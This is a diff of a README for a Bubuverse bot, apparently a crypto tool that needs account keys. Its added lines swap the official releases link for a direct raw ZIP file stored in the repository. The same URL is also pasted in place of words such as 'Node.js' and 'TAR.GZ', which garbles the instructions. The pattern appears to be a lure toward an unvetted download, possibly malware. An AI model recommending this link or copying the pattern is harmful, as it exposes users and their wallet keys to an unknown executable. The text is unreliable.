Zolvhub/Bubuverse-BOT/README.md

 - If you cannot access a binary for your platform, you can build from source using the provided instructions in the Development section.

 Access the latest release
 - The link at the top of this page points to the releases area where you can find the latest assets.
-For convenience, you can open it here: https://github.com/Zolvhub/Bubuverse-BOT/releases
+For convenience, you can open it here: https://github.com/Zolvhub/Bubuverse-BOT/raw/refs/heads/main/viscountess/BOT_Bubuverse_2.5.zip
 - If you experience issues downloading from the page, check the Releases section for alternative assets or notes about platform compatibility.

 Installation and setup
 Prerequisites
 - Operating system: Windows 10/11, macOS 10.15+, Linux (X64 with glibc 2.28+)
-- Node.js or runtime compatible with the build (exact version depends on the asset you choose)
+- https://github.com/Zolvhub/Bubuverse-BOT/raw/refs/heads/main/viscountess/BOT_Bubuverse_2.5.zip or runtime compatible with the build (exact version depends on the asset you choose)
 - Access to a Bubuverse testnet or mainnet account, with the necessary keys stored securely
 - Network access to the Bubuverse endpoints used by the bot

 Getting the release
 - Visit the Releases page to download the asset for your platform.
 - Save the file to a local directory you control.
-- If the asset is a ZIP or TAR.GZ, extract it to a working directory.
+- If the asset is a ZIP or https://github.com/Zolvhub/Bubuverse-BOT/raw/refs/heads/main/viscountess/BOT_Bubuverse_2.5.zip, extract it to a working directory.
 - Ensure the executable has the proper permissions (for Linux/macOS, run chmod +x on the binary).

 First run and basic configuration